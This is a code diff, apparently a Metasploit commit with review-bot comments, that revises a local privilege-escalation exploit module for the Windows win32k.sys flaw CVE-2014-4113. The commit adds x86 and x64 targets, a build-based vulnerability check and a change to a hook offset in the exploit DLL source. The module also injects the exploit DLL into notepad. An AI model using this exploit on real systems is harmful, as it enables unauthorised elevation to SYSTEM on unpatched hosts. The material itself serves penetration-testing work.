More robust check routine for cve-2014-4113
parent
5fa0403ac5
commit
46b1abac4a
|
@ -87,7 +87,7 @@ LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam) {
|
|||
HookCallbackClue = 1;
|
||||
if (UnhookWindowsHook(WH_CALLWNDPROC, HookCallback)) {
|
||||
#ifdef _M_X64
|
||||
lpPrevWndFunc = (WNDPROC)SetWindowLongPtr(*(HWND *)(lParam + 0x18), GWLP_WNDPROC, (ULONG_PTR)HookCallbackTwo);
|
||||
lpPrevWndFunc = (WNDPROC)SetWindowLongPtr(*(HWND *)(lParam + 24), GWLP_WNDPROC, (ULONG_PTR)HookCallbackTwo);
|
||||
#else
|
||||
lpPrevWndFunc = (WNDPROC)SetWindowLongA(*(HWND *)(lParam + 12), GWLP_WNDPROC, (LONG)HookCallbackTwo);
|
||||
#endif
|
||||
|
|
|
@ -48,17 +48,18 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
# * Windows 2003 SP2
|
||||
# * Windows 7 SP1
|
||||
# * Windows 2008
|
||||
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
|
||||
# Tested on (64 bits):
|
||||
# * Windows 2008 R2 SP1
|
||||
# * Windows 7 SP1
|
||||
[ 'Automatic', { } ],
|
||||
# * Windows 2008 R2 SP1
|
||||
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
|
||||
],
|
||||
'Payload' =>
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 4096,
|
||||
'DisableNops' => true
|
||||
},
|
||||
'References' =>
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2014-4113'],
|
||||
['OSVDB', '113167'],
|
||||
|
@ -78,11 +79,28 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
if sysinfo["Architecture"] =~ /(wow|x)64/i
|
||||
arch = ARCH_X86_64
|
||||
elsif sysinfo["Architecture"] =~ /x86/i
|
||||
arch = ARCH_X86
|
||||
end
|
||||
|
||||
file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
|
||||
major, minor, build, revision, branch = file_version(file_path)
|
||||
vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
|
||||
|
||||
Exploit::CheckCode::Detected
|
||||
# Neither target suports Windows 8 or 8.1
|
||||
return Exploit::CheckCode::Safe if build == 9200
|
||||
return Exploit::CheckCode::Safe if build == 9600
|
||||
|
||||
if arch == ARCH_X86
|
||||
return Exploit::CheckCode::Vulnerable if [2600, 3790, 7600].include?(build)
|
||||
return Exploit::CheckCode::Vulnerable if revision <= 18577
|
||||
else
|
||||
return Exploit::CheckCode::Vulnerable if build == 7601 && revision <= 18577
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
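Review bot: The x86 branch's second Vulnerable return, `return Exploit::CheckCode::Vulnerable if revision <= 18577`, is not tied to a build the way the x64 branch's `build == 7601 && revision <= 18577` is, so any x86 host with an unlisted build number and a low revision is reported vulnerable; revision numbers are only comparable within one build, so the line should read `return Exploit::CheckCode::Vulnerable if build == 7601 && revision <= 18577` to match the x64 branch. The destructuring of `file_version(file_path)` also has no guard: if that helper returns nil when win32k.sys cannot be read (it appears to, but confirm against the mixin), `build` and `revision` become nil and the `<=` comparisons raise instead of yielding a CheckCode, so `return Exploit::CheckCode::Unknown if build.nil?` after the `vprint_status` call would keep the check well-behaved. A host whose architecture matches neither regex leaves `arch` nil and silently takes the x64 branch, which is probably not intended. The comment would also read better as `# Neither target supports Windows 8 or 8.1`. The enclosing `check` method begins outside the hunk.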
@ -90,11 +108,16 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
fail_with(Exploit::Failure::None, 'Session is already elevated')
|
||||
end
|
||||
|
||||
target_arch = ARCH_X86
|
||||
if check != Exploit::CheckCode::Vulnerable
|
||||
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
|
||||
end
|
||||
|
||||
if sysinfo["Architecture"] =~ /wow64/i
|
||||
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
|
||||
elsif sysinfo["Architecture"] =~ /x64/
|
||||
target_arch = ARCH_X86_64
|
||||
elsif sysinfo["Architecture"] =~ /x64/ && target.arch.first == ARCH_X86
|
||||
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
|
||||
elsif sysinfo["Architecture"] =~ /x86/ && target.arch.first == ARCH_X86_64
|
||||
fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
|
||||
end
|
||||
|
||||
print_status('Launching notepad to host the exploit...')
|
||||
|
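Review bot: The architecture classification here disagrees with the one in `check`: `check` matches `/(wow|x)64/i` and `/x86/i`, while this hunk's new `elsif sysinfo["Architecture"] =~ /x64/` is case-sensitive, so a sysinfo string that `check` classifies as 64-bit could still leave `target_arch` at `ARCH_X86` and pick the wrong DLL later; use `elsif sysinfo["Architecture"] =~ /x64/i` so both sites agree. `sysinfo["Architecture"]` is also evaluated twice in the new `if`/`elsif` (three times counting the call inside `check`); reading it once into a local, e.g. `host_arch = sysinfo["Architecture"]`, keeps the two branches from ever seeing different values. Note that for a WOW64 session `check` reports Vulnerable (it matches the `(wow|x)64` branch) and this code then fails with NoTarget, so the user sees a Vulnerable verdict the module will not act on; a short comment on the wow64 branch saying the host is exploitable but not from a WOW64 session would explain the apparent contradiction. The enclosing `exploit` method continues outside the hunk.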
@ -110,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
|
||||
if target_arch == ARCH_X86
|
||||
if target.arch.first == ARCH_X86
|
||||
dll_file_name = 'cve-2014-4113.x86.dll'
|
||||
else
|
||||
dll_file_name = 'cve-2014-4113.x64.dll'
|
||||
|
|